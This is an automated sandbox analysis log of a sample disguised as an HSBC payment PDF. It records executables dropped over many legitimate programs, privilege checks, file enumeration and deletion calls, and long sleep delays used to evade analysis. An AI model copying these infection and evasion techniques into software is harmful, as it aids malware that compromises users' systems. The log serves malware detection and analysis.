Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files\Mozilla Firefox\firefox.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\pwahelper.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files\Mozilla Firefox\updater.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\kinit.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Au3Check.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\policytool.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\Common.ShowHelp.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files\7-Zip\Uninstall.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\rmiregistry.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Integration\Addons\OneDriveSetup.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe	Jump to dropped file
Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Dropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\117.0.5938.134\elevation_service.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\CLVIEW.EXE	Jump to dropped file
Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Dropped PE file which has not been started: C:\Windows\System32\msdtc.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Windows\System32\wbem\WmiApSrv.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedgewebview2.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\pack200.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateOnDemand.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\rmid.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files\7-Zip\7zFM.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\klist.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\tnameserv.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate32.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\Install\{6BB58CDD-A64E-41C8-8D92-79A516D3D118}\117.0.5938.134_117.0.5938.132_chrome_updater.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\jp2launcher.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\117.0.5938.134\notification_helper.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Integration\Integrator.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\unpack200.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Windows\System32\VSSVC.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.134\117.0.5938.134_117.0.5938.132_chrome_updater.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Windows\System32\SearchIndexer.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\CNFNOT32.EXE	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\excelcnv.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files\Mozilla Firefox\private_browsing.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Au3Info.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\jjs.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\AppSharingHookController.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\Installer\setup.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\orbd.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\117.0.5938.134\chrome_pwa_launcher.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateCore.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\chrome_proxy.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdate.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_pwa_launcher.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\ktab.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files\Mozilla Firefox\plugin-container.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exe	Jump to dropped file

Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe

Check user administrative privileges: GetTokenInformation,DecisionNodes

graph_1-210498

Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe

API coverage: 5.8 %

Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe TID: 7516	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe TID: 7488	Thread sleep time: -270000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\perfhost.exe TID: 7920	Thread sleep count: 6608 > 30
Source: C:\Windows\SysWOW64\perfhost.exe TID: 7920	Thread sleep time: -66080000s >= -30000s
Source: C:\Windows\SysWOW64\perfhost.exe TID: 7920	Thread sleep count: 3390 > 30
Source: C:\Windows\SysWOW64\perfhost.exe TID: 7920	Thread sleep time: -33900000s >= -30000s

Source: C:\Windows\SysWOW64\perfhost.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\perfhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Code function: 1_2_0046445A GetFileAttributesW,FindFirstFileW,FindClose,	1_2_0046445A
Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Code function: 1_2_0046C6D1 FindFirstFileW,FindClose,	1_2_0046C6D1
Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Code function: 1_2_0046C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	1_2_0046C75C
Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Code function: 1_2_0046EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	1_2_0046EF95
Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Code function: 1_2_0046F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	1_2_0046F0F2
Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Code function: 1_2_0046F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	1_2_0046F3F3
Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Code function: 1_2_004637EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	1_2_004637EF
Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Code function: 1_2_00463B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	1_2_00463B12
Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Code function: 1_2_0046BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	1_2_0046BCBC

Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe

Code function: 1_2_004049A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

1_2_004049A0

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599875	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599766	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599645	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599513	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599402	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599229	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599096	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598938	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598813	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598688	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598563	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598434	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598328	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598219	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598094	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597985	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597860	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597719	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597609	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597500	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597390	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597280	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597171	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597061	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596953	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596844	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596735	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596594	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596485	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596360	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596235	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596110	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595985	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595860	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595735	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595610	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595492	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595375	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595265	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595157	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595032	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594912	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594785	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594657	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594532	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594387	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594173	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 593923	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 593778	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 593527	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 593422	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 593313	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 593203	Jump to behavior

Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File opened: C:\Program Files (x86)\common files\Oracle\Java\javapath\java.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File opened: C:\Program Files (x86)\common files\Oracle\Java\javapath\javaw.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File opened: C:\Program Files (x86)\common files\Oracle\Java\javapath\javaws.exe	Jump to behavior
